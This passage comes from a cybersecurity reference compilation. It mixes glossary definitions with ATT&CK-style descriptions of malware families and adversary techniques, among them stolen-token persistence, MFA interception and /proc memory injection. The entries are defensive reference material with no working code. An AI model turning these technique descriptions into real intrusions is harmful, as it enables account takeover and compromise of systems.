- Interpretation: In certain systems, direct mitigation could introduce new risks, especially if the system is highly interconnected or complex, such as in legacy industrial control systems (ICS). Patching or modifying these systems could result in unplanned downtime, disruptions, or even safety risks.
- Use Case: In a power grid control system, attempting to patch or disable certain services related to device communications might disrupt critical operations, leading to unintended service outages.

Risk of Reducing Security Coverage:

- Interpretation: In some cases, mitigating a technique might reduce the visibility or effectiveness of other security controls, limiting an organization’s ability to detect broader attacks.
- Use Case: Disabling script execution on a web server to mitigate potential PowerShell-based attacks could interfere with legitimate administrative operations that rely on scripting, while attackers may still find alternate ways to execute code.

Introduction of New Vulnerabilities:

- Interpretation: In highly sensitive or tightly controlled environments, implementing certain mitigations might create vulnerabilities in other parts of the system. For instance, disabling default security mechanisms in an attempt to resolve compatibility issues may open the system to exploitation.
- Use Case: Disabling certificate validation to resolve internal communication issues in a secure environment could lead to man-in-the-middle attacks, creating a greater vulnerability than the original problem.

Negative Impact on Performance and Availability:

- Interpretation: Mitigations that involve removing or restricting system functionalities can have unintended consequences for system performance and availability. Some mitigations, while effective at blocking certain attacks, may introduce performance bottlenecks or compromise essential operations.
- Use Case: Implementing high levels of encryption to mitigate data theft might result in significant performance degradation in systems handling large volumes of real-time transactions.

Name: Downdelph
Type: malware
Description: Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015.

Term: security assessment
Definition: An evaluation of the security provided by a system, device or process.

Term: keying material
Definition: Data that is represented as a binary string such that any non-overlapping segments of the string with the required lengths can be used as secret keys, secret initialization vectors and other secret parameters.

Name: One-Way Communication
Type: attack-pattern
Description: Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Term: Cyber Attack
Definition: Actions taken in cyberspace that create noticeable denial effects (i.e., degradation, disruption, or destruction) in cyberspace or manipulation that leads to denial that appears in a physical domain, and is considered a form of fires.

Term: Media Access Control (MAC)
Definition: A unique 48-bit value that is assigned to a particular wireless network interface by the manufacturer.

Term: Security Authorization
Definition: Access privileges that are granted to an entity; conveying an “official” sanction to perform a security function or activity.

Term: non-repudiation
Definition: A service that is used to provide assurance of the integrity and origin of data in such a way that the integrity and origin can be verified and validated by a third party as having originated from a specific entity in possession of the private key (i.e., the signatory).

Name: Proxysvc
Type: malware
Description: Proxysvc is a malicious DLL used by Lazarus Group in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of Proxysvc is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process.

Name: Indicator Removal
Type: attack-pattern
Description: Adversaries may selectively delete or modify artifacts generated to reduce indications of their presence and blend in with legitimate activity. Rather than broadly removing evidence, adversaries may target specific artifacts that appear anomalous or are likely to draw scrutiny, while leaving sufficient data intact to maintain the appearance of normal system behavior.

Artifacts such as command histories, log entries, or file metadata may be altered in ways that align with expected user or system activity. Location, format, and type of artifact (such as command or login history) are often platform-specific, allowing adversaries to tailor modifications that minimize suspicion.

These actions may not prevent detection entirely but can delay recognition of malicious activity or reduce the fidelity of alerts by making events appear benign or consistent with routine operations. Additionally, selectively removed or modified artifacts may still be recoverable through deeper forensic analysis, though their absence or alteration can complicate timeline reconstruction and attribution.

Term: non-repudiation
Definition: The inability to deny responsibility for performing a specific act.

Term: claim
Definition: A true-false statement about the limitations on the values of an unambiguously defined property called the claim’s property; and limitations on the uncertainty of the property’s values falling within these limitations during the claim’s duration of applicability under stated conditions.

Term: reciprocity
Definition: The mutual agreement among participating organizations to accept each other’s security assessments in order to reuse information-system resources and/or to accept each other’s assessed security posture in order to share information.

Name: IronWind
Type: malware
Description: IronWind is a custom loader malware that has been in use since at least 2023 by actors including WIRTE to target entities in the Middle East.

Term: subject
Definition: The entity requesting to perform an operation upon the object.

Term: key combiner
Definition: A function that takes multiple keys or shared secret values as input (possibly along with other information) and produces a single combined key.

Term: Key transport (automated)
Definition: A key-establishment procedure whereby one entity (the sender) selects a value for secret keying material and then securely distributes that value to one or more other entities (the receivers). Contrast with Key agreement.

Term: Digital Identity Acceptance Statement
Definition: Documents the results of the digital identity risk management process. This includes the impact assessment, initial assurance level selection, and tailoring process.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Modernization Act FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses. 
Note 2: Organizations subordinate to federal agencies may use the term Senior Agency Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: ERM
Definition: The methods and processes used by an enterprise to manage risks to its mission and to establish the trust necessary for the enterprise to support shared missions. It involves the identification of mission dependencies on enterprise capabilities, the identification and prioritization of risks due to defined threats, the implementation of countermeasures to provide both a static risk posture and an effective dynamic response to active threats; and it assesses enterprise performance against threats and adjusts countermeasures as necessary.

Term: Identity Federation
Definition: A group of organizations that agree to follow the rules of a trust framework.

Name: PULSECHECK
Type: malware
Description: PULSECHECK is a web shell written in Perl that was used by APT5 as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) companies.

Term: MA
Definition: The process of managing PIV Cards or Derived PIV Credentials (and its token) once they are issued. It includes re-issuance, post issuance updates, and termination.

Name: TRANSLATEXT
Type: malware
Description: TRANSLATEXT is malware that is believed to be used by Kimsuky. TRANSLATEXT masqueraded as a Google Translate extension for Google Chrome, but is actually a collection of four malicious Javascript files that perform defense evasion, information collection and exfiltration.

Term: ID
Definition: The set of physical and behavioral characteristics by which an individual is uniquely recognizable.

Term: adequate security
Definition: Security commensurate with the risk resulting from the loss, misuse, or unauthorized access to or modification of information.

Term: RA
Definition: The process of identifying, estimating, and prioritizing risks to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, and other organizations, resulting from the operation of a system. It is part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders' efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives.

Term: learning program
Definition: Consists of numerous elements led by the learning program managers, who develop a strategic plan to deliver a right-sized program to reduce organizational cybersecurity and privacy risks via workforce education and training. Operates throughout the year and incorporates plans for ongoing improvements that are based on rigorous assessments and metrics that support compliance and other mandated reporting.

Term: Software Bill of Materials
Definition: A formal record containing the details and supply chain relationships of various components used in building software. Software developers and vendors often create products by assembling existing open source and commercial software components. The SBOM enumerates these components in a product.

Term: identity
Definition: The bit string denoting the identifier associated with an entity.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. The function is expected to have the following three properties:
1. Collision resistance (see Collision resistance),
2. Preimage resistance (see Preimage resistance) and
3. Second preimage resistance (see Second preimage resistance).
Approved hash functions are specified in [FIPS 180-4].

Term: SBOM
Definition: A formal record containing the details and supply chain relationships of various components used in building software. Software developers and vendors often create products by assembling existing open source and commercial software components. The SBOM enumerates these components in a product.

Term: Identity Management System (IDMS)
Definition: Identity management system comprised of one or more systems or applications that manages the identity verification, validation, and issuance process.

Term: Chain-based proof of stake consensus model
Definition: A proof of stake consensus model where the blockchain network decides the next block through pseudo-random selection, based on a personal stake to overall system asset ratio.

Term: Similarity digest
Definition: A similarity digest is a (compressed) representation of the original data object’s feature set that is suitable for comparison with other similarity digests created by the same algorithm. In most cases, the digest is much smaller than the original artifact and the original object is not recoverable from the digest.

Term: DP
Definition: A mathematical framework that quantifies privacy risk to individuals as a consequence of data collection and subsequent data release.

Term: SP
Definition: A type of publication issued by NIST. Specifically, the Special Publication 800-series reports on the Information Technology Laboratory's research, guidelines, and outreach efforts in computer security, and its collaborative activities with industry, government, and academic organizations. The 1800 series reports the results of NCCoE demonstration projects.

Term: root user
Definition: A user that is authorized (and therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform.

Term: MAC tag
Definition: Data obtained from the output of a MAC algorithm (possibly by truncation) that can be used by an entity to verify the integrity and the origination of the information used as input to the MAC algorithm.

Term: information technology product
Definition: See system component.

Term: systems security engineer
Definition: Individual who practices the discipline of systems security engineering, regardless of their formal title. Additionally, the term <i>systems security engineer</i> refers to multiple individuals who operate on the same team or cooperating teams.

Term: criticality
Definition: An attribute assigned to an asset that reflects its relative importance or necessity in achieving or contributing to the achievement of stated goals.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Modernization Act FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses. 
Note 2: Organizations subordinate to federal agencies may use the term Senior Agency Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: variability
Definition: Changes in dataset, whether data flow rate, format/structure, semantics, and/or quality that impact the analytics application.

Term: CIO
Definition: The senior official that provides advice and other assistance to the head of the agency and other senior management personnel of the agency to ensure that IT is acquired and information resources are managed for the agency in a manner that achieves the agency’s strategic goals and information resources management goals; and is responsible for ensuring agency compliance with, and prompt, efficient, and effective implementation of, the information policies and information resources management responsibilities, including the reduction of information collection burdens on the public.

Name: FakeM
Type: malware
Description: FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic.

Term: Security Event Management Software
Definition: Software that imports security event information from multiple data sources, normalizes the data, and correlates events among the data sources.

Term: <em>Global performance metric</em>
Definition: For a predictor, the number of accurate predictions over a long period.

Term: Hotfix
Definition: Microsoft’s term for “patch.”

Term: <em>a</em>
Definition: The significance level.

Term: DIAS
Definition: Documents the results of the digital identity risk management process. This includes the impact assessment, initial assurance level selection, and tailoring process.

Term: information security policy
Definition: A high-level policy of an organization that is created to support and enforce portions of the organization’s Information Management Policy by specifying in more detail what information is to be protected from anticipated threats and how that protection is to be attained.

Name: DUSTTRAP
Type: malware
Description: DUSTTRAP is a multi-stage plugin framework associated with APT41 operations with multiple components.

Term: <em>n</em>
Definition: The number of data blocks or data segments in the plaintext.

Term: <em>log(x)</em>
Definition: The natural logarithm of x: log(x) = loge(x) = ln(x).

Term: False Negative
Definition: Incorrectly classifying malicious activity as benign.

Term: Key-confirmation provider
Definition: The party that provides assurance to the other party (i.e., the recipient) that the two parties have indeed established a shared secret key or other keying material.

Term: General Remediation Level
Definition: measures the availability of remediation measures that can mitigate the vulnerability other than rendering the misused software feature useless (e.g., disabling the affected feature, removing the software).

Name: Maze
Type: malware
Description: Maze ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, Maze operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.

Term: access control
Definition: Procedures and controls that limit or detect access to critical information resources. This can be accomplished through software, biometrics devices, or physical access to a controlled space.

Term: Internet Engineering Task Force (IETF)
Definition: The Internet Engineering Task Force is the premier Internet standards body that develops open Internet standards.

Term: encapsulation
Definition: The process of applying the Encaps algorithm of a KEM. This algorithm accepts the encapsulation key as input, requires private randomness, and produces a shared secret key and an associated ciphertext as output.

Term: access control
Definition: The decision to permit or deny a subject access to system objects (network, data, application, service, etc.).

Term: Digital Signature Algorithm
Definition: the digital signature algorithm specified in FIPS PUB 186.

Term: NIAP product compliant list (PCL)
Definition: The list of CS and CS-enabled COTS products evaluated and validated pursuant to the National Information Assurance Partnership (NIAP) program. PCL products conform with Common Criteria for IT Security Evaluation (ISO/IEC Standard 15408-1:2009).

Name: Phishing for Information
Type: attack-pattern
Description: Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from Phishing in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means. Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by Email Spoofing the identity of the sender, which can be used to fool both the human recipient as well as automated security tools. 

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules).

Name: Application Access Token
Type: attack-pattern
Description: Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS). 

OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.

For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded. With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account. The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.

Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated. Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

Term: Cryptographic Hash Value
Definition: The result of applying a cryptographic hash function to data (e.g., a message).

Term: RED optical fiber line
Definition: An optical fiber that carries RED signal or that originates/terminates in RED equipment or system.

Term: <em>X =? Y</em>
Definition: Check for equality of X and Y.

Term: identity verification
Definition: The process of confirming or denying that a claimed identity is correct by comparing the credentials (something you know, something you have, something you are) of a person requesting access with those credentials previously proven and stored in the PIV Card or system and associated with the identity being claimed.

Term: COMSEC equipment
Definition: Equipment designed to provide security to telecommunications by converting information to a form unintelligible to an unauthorized interceptor and, subsequently, by reconverting such information to its original form for authorized recipients; also, equipment designed specifically to aid in, or as an essential element of, the conversion process. COMSEC equipment includes cryptographic-equipment, crypto-ancillary equipment, cryptographic production equipment, and authentication equipment.

Term: authority
Definition: Person(s) or established bodies with rights and responsibilities to exert control in an administrative sphere.

Name: Mori
Type: malware
Description: Mori is a backdoor that has been used by MuddyWater since at least January 2022.

Term: KDK
Definition: A key used as an input to a key-derivation method to derive additional keying material.

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors including, for example, cyber, physical, and deception. These objectives typically include establishing and extending footholds within the IT infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat pursues its objectives repeatedly over an extended period; adapts to defenders’ efforts to resist it; and is determined to maintain the level of interaction needed to execute its objectives.

Term: Usability
Definition: The extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency and satisfaction in a specified context of use.

Term: Aggregate
Definition: To combine several more-specific prefixes into a less-specific prefix.

Term: secret key
Definition: Compare with a private key, which is used with a public-key (asymmetric-key) algorithm.

Term: mission operations center
Definition: A facility that provides C2 for the satellite bus, receives TT&amp;C from the satellite, and requests and retrieves data as necessary.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have an adverse impact on the confidentiality, integrity, or availability of a system. Examples of malicious code include viruses, worms, Trojan horses, spyware, some forms of adware, or other code-based entities that infect a host.

Term: Authenticator Assurance Level (AAL)
Definition: A category describing the strength of the authentication process.

Term: NC
Definition: A varying value that has, at most, a negligible chance of repeating; for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: card management system
Definition: The system that manages the lifecycle of a PIV Card application.

Term: Brokered Trust
Definition: Describes the case where two entities do not have direct business agreements with each other, but do have agreements with one or more intermediaries so as to enable a business trust path to be constructed between the entities. The intermediary brokers operate as active entities, and are invoked dynamically via protocol facilities when new paths are to be established.

Term: Disk-to-File Copy
Definition: Copying the contents of media to a single logical data file.

Term: information system security plan
Definition: Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. The system security plan describes the system components that are included within the system, the environment in which the system operates, how the security requirements are implemented, and the relationships with or connections to other systems.

Term: signing key
Definition: The cryptographic key used to create a signature. In asymmetric cryptography, the signing key refers to the private key of the cryptographic key pair. In symmetric cryptography, the signing key is the symmetric key.

Term: relationship style
Definition: An explicitly defined convention for characterizing relationships for a use case.

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors (e.g., cyber, physical, and deception). These objectives typically include establishing and extending footholds within the information technology infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly over an extended period of time; (ii) adapts to defenders’ efforts to resist it; and (iii) is determined to maintain the level of interaction needed to execute its objectives.

Term: threat analysis
Definition: Formal description and evaluation of threat to a system or organization.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants so that neither party can predetermine the value of the secret keying material independently of the contributions of the other party; contrast with key transport.

Term: message digest
Definition: The result of applying a hash function to a message. Also known as a "hash value."

Term: Elliptic Curve Digital Signature Algorithm
Definition: A digital signature algorithm that is an analog of DSA using elliptic curves.

Term: authorize processing
Definition: Formal declaration by a Designated Approving Authority that an Information System is approved to operate in a particular security mode using a prescribed set of safeguards at an acceptable level of risk.

Term: cryptographic key
Definition: The parameter of a block cipher that determines the selection of a permutation from the block cipher family.

Term: processing
Definition: An operation or set of operations performed on personal information that can include, but is not limited to, the collection, retention, logging, generation, transformation, use, disclosure, transfer, or disposal of personal information.

Term: CSA
Definition: A trusted entity that provides on-line verification to a relying party of a subject certificate's trustworthiness, and may also provide additional attribute information for the subject certificate.

Term: ISC
Definition: See Authorization Boundary.

Term: Source Restriction
Definition: A restriction configured for an authorized key that limits the IP addresses or host names from which login using the key may take place. In some SSH implementations, source restrictions can be configured by using a "from=" restriction in an authorized keys file.

Term: party
Definition: An individual (person), organization, device, or process. “Entity” is a synonym for party.

Term: ISC
Definition: A discrete identifiable IT asset that represents a building block of an information system.

Term: adversity
Definition: Adverse conditions, stresses, attacks, or compromises.

Term: machine unlearning
Definition: A technique that involves selectively removing the influences of spe­cific training data points from a trained machine learning model, such as to remove unwanted capabilities or knowledge in a foundation model, or to enable a user to request the removal of their records from a model. Efficient approximate unlearn­ing techniques may not require retraining the ML model from scratch.

Term: AP
Definition: A set of filter processes that are arranged in a linear order using one-way inter-process communications to transfer data between processes. The linear flow is enforced with mandatory and discretionary access control mechanisms.

Term: <em>A(i)</em>
Definition: The output of the ith  iteration in the first pipeline in a doublepipeline iteration mode.

Term: applicant
Definition: A subject undergoing the processes of identity proofing and enrollment.

Term: Electronic Evidence
Definition: Information and data of investigative value that is stored on or transmitted by an electronic device.

Term: accuracy (absolute)
Definition: The degree of conformity of a measured or calculated value to the true value, typically based on a global reference system. For time, the global reference can be based on the following time scales: UTC, International Atomic Time (TAI), or GPS. For position, the global reference can be WGS 84.

Term: <em>PRF(s, x)</em>
Definition: A pseudorandom function with seed <i>s</i> and input data <i>x</i>.

Name: Account Access Removal
Type: attack-pattern
Description: Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials, revoked permissions for SaaS platforms such as Sharepoint) to remove access to accounts. Adversaries may also subsequently log off and/or perform a System Shutdown/Reboot to set malicious changes into place.

In Windows, Net utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> PowerShell cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the <code>passwd</code> utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as Data Destruction and Defacement, in order to impede incident response/recovery before completing the Data Encrypted for Impact objective.

Term: pre‐training
Definition: A component of the training stage in which a model learns general patterns, features, and relationships from vast amounts of unlabeled data, such as through self-supervised learning. Pre-training can equip models with knowledge of gen­eral features or patterns which may be useful in downstream tasks, and can be followed with additional training or fine-tuning that specializes the model for a specific downstream task.

Term: foundation model
Definition: In generative AI, models trained on broad data using self-supervised learning that can be adapted such as through fine-tuning for a variety of down­stream tasks.

Term: SSD
Definition: A storage device that uses solid-state memory to store persistent data.

Term: interface
Definition: A boundary between the IoT device and entities where interactions take place. There are two types of interfaces: network and local.

Term: systems engineering
Definition: An engineering discipline whose responsibility is creating and executing an interdisciplinary process to ensure that the customer and all other stakeholder needs are satisfied in a high-quality, trustworthy, cost-efficient, and schedule-compliant manner throughout a system’s entire life cycle.

Term: ICS
Definition: An information system used to control industrial processes such as manufacturing, product handling, production, and distribution.

Term: penetration
Definition: A security event, or a combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system or system resource without having authorization to do so.

Term: key agreement
Definition: A key-establishment procedure where resultant keying material is a function of information contributed by two or more participants, so that no party can predetermine the value of the keying material independently of any other party’s contribution.

Term: Mail Server
Definition: A host that provides “electronic post office” facilities. It stores incoming mail for distribution to users and forwards outgoing mail. The term may refer to just the application that performs this service, which can reside on a machine with other services, but for this document the term refers to the entire host including the mail server application, the host operating system and the supporting hardware.

Term: information system security plan
Definition: A formal document that provides an overview of the security requirements for an information system and describes the security controls in place or planned for meeting those requirements.

Term: availability (PNT)
Definition: The availability of a PNT system is the percentage of time that the services of the system are usable. Availability is an indication of the ability of the system to provide usable service within the specified coverage area. Signal availability is the percentage of time that PNT signals transmitted from external sources are available for use. Availability is a function of both the physical characteristics of the environment and the technical capabilities of the PNT service provider.

Term: security control and privacy control
Definition: The means of managing risk, including policies, procedures, guidelines, practices, or organizational structures, which can be of an administrative, technical, management, or legal nature.

Term: authenticated protected channel
Definition: An encrypted channel that uses approved cryptography where the connection initiator (client) has authenticated the recipient (server).

Term: Digital asset
Definition: Any asset that is purely digital, or is a digital representation of a physical asset.

Term: controlled area
Definition: Any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system.

Name: Code Repositories
Type: attack-pattern
Description: Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. 

Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information), establishing operational resources (ex: Compromise Accounts or Compromise Infrastructure), and/or initial access (ex: Valid Accounts or Phishing). 

**Note:** This is distinct from Code Repositories, which focuses on Collection from private and internally hosted code repositories.

Term: assembly
Definition: An item forming a portion of an equipment, that can be provisioned and replaced as an entity and which normally incorporates replaceable parts and groups of parts.

Term: Rivest-Shamir-Adleman
Definition: An algorithm approved in FIPS 186 for digital signatures and in SP 800-56B for key establishment.

Term: vulnerability analysis
Definition: See vulnerability assessment.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary (although bounded) length to a fixed-length bit string. Approved hash functions satisfy the following properties: 
1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and 
2. (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: Runs Test
Definition: The purpose of the runs test is to determine whether the number of runs of ones and zeros of various lengths is as expected for a random sequence. In particular, this test determines whether the oscillation between such substrings is too fast or too slow.

Term: training stage
Definition: The stage of a machine learning pipeline in which a model learns parameters that minimize its error against an objective function based on training data.

Term: emergence
Definition: The behaviors and outcomes that result from how individual system elements compose to form the system as a whole.

Name: Multi-Factor Authentication Interception
Type: attack-pattern
Description: Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. 

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). 

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.

Term: Defect
Definition: An occurrence of a defect check that failed on an assessment object. It indicates a weakened state of security that increases risk.

Name: Data from Configuration Repository
Type: attack-pattern
Description: Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.

Term: isogeny
Definition: A (non-constant) mapping from an elliptic curve to a second elliptic curve, which preserves point addition and fixes the identity point.

Term: Security-Oriented Code Review
Definition: A code review, or audit, investigates the coding practices used in the application. The main objective of such reviews is to discover security defects and potentially identify solutions.

Term: Secret keying material
Definition: As used in this Recommendation, the secret keying material that is either (1) derived by applying the key-derivation method to the shared secret and other shared information during a key-agreement transaction, or (2) is transported during a key-transport transaction.

Term: Key share
Definition: One of n parameters (where n ≥ 2) such that among the n key shares, any k key shares (where k ≥ n) can be used to construct a key value, but having any k−1 or fewer key shares provides no knowledge of the (constructed) key value. Sometimes called a cryptographic key component or key split.

Term: one-source mapping
Definition: A mapping between concepts within a single concept source.

Term: Critical Services
Definition: The subset of mission essential services required to conduct manufacturing operations. Function or capability that is required to maintain health, safety, the environment and availability for the equipment under control.

Term: frequency offset
Definition: [See source document for the complete definition.]

Term: Public CA
Definition: A trusted third party that issues certificates as defined in IETF RFC 5280. A CA is considered public if its root certificate is included in browsers and other applications by the developers of those browsers and applications. The CA/Browser Forum defines the requirements public CAs must follow in their operations.

Term: Cyber Threat
Definition: A possible danger to a computer system, which may result in the interception, alteration, obstruction, or destruction of computational resources, or other disruption to the system.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
[Note 1: With respect to SecCM, a Senior Agency Information Security Officer is an individual that provides organization-wide procedures and/or templates for SecCM, manages or participates in the Configuration Control Board, and/or provides technical staff for security impact analyses.
Note 2: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Name: Proc Memory
Type: attack-pattern
Description: Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd. 

